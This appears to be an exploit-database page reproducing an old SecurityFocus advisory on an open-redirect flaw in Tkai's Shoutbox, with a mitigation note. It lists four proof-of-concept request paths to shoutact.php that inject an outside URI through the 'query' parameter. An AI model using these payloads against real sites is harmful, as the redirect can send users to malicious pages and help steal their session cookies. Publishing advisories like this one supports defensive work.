header-logo
Suggest Exploit
vendor:
Shoutbox
by:
SecurityFocus
7.5
CVSS
HIGH
Remote URI Redirection
601
CWE
Product Name: Shoutbox
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

Tkai’s Shoutbox Remote URI Redirection Vulnerability

It is reported that an attacker can exploit this issue by supplying the URI of a malicious site through the 'query' parameter of a link. A successful attack may result in various attacks including theft of cookie based authentication credentials.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in a URI.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12914/info

Tkai's Shoutbox is reported prone to a remote URI redirection vulnerability.

It is reported that an attacker can exploit this issue by supplying the URI of a malicious site through the 'query' parameter of a link.

A successful attack may result in various attacks including theft of cookie based authentication credentials.

/shoutact.php?yousay=default&query=http://www.example.com

/shoutact.php?yousay=default&name=default&query=http://www.example.com

/shoutact.php?yousay=default&email=default&query=http://www.example.com

/shoutact.php?yousay=default&email=default&name=default&query=www.example.com

Navigation

Suggest Exploit

Services By CQR